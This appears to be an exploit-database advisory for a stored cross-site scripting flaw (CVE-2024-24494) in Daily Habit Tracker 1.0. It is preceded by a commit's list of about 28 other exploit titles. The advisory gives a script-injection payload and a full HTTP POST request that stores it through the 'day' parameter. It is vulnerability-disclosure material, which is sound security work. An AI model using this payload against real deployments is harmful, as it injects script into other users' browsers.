a44e138f78
28 changes to exploits/shellcodes/ghdb Casdoor < v1.331.0 - '/api/set-password' CSRF GL-iNet MT6000 4.5.5 - Arbitrary File Download Axigen < 10.5.7 - Persistent Cross-Site Scripting Blood Bank v1.0 - Stored Cross Site Scripting (XSS) CE Phoenix v1.0.8.20 - Remote Code Execution Daily Habit Tracker 1.0 - Broken Access Control Daily Habit Tracker 1.0 - SQL Injection Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) Elementor Website Builder < 3.12.2 - Admin+ SQLi Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login) FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Gibbon LMS v26.0.00 - SSTI vulnerability Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) OpenCart Core 4.0.2.3 - 'search' SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal Smart School 6.4.1 - SQL Injection Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) ASUS Control Center Express 01.06.15 - Unquoted Service Path Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
2.4 KiB
Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
Date: 2 Feb 2024
Exploit Author: Yevhenii Butenko
Vendor Homepage: https://www.sourcecodester.com
Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
Version: 1.0
Tested on: Debian
CVE : CVE-2024-24494
Stored Cross-Site Scripting (XSS):
Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.
Affected Components:
add-tracker.php, update-tracker.php
Vulnerable parameters:
- day
- exercise
- pray
- read_book
- vitamins
- laundry
- alcohol
- meat
Description:
Multiple parameters within
Add TrackerandUpdate Trackerrequests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.
Proof of Concept:
The following payload <script>alert('STORED_XSS')</script> can be used in order to exploit the vulnerability.
Below is an example of a request demonstrating how a malicious payload can be stored within the day value:
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
Recommendations
When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.